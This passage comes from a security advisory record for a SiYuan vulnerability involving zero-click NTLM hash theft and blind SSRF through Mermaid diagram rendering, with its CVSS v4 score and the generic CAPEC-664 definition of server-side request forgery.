"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering"
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.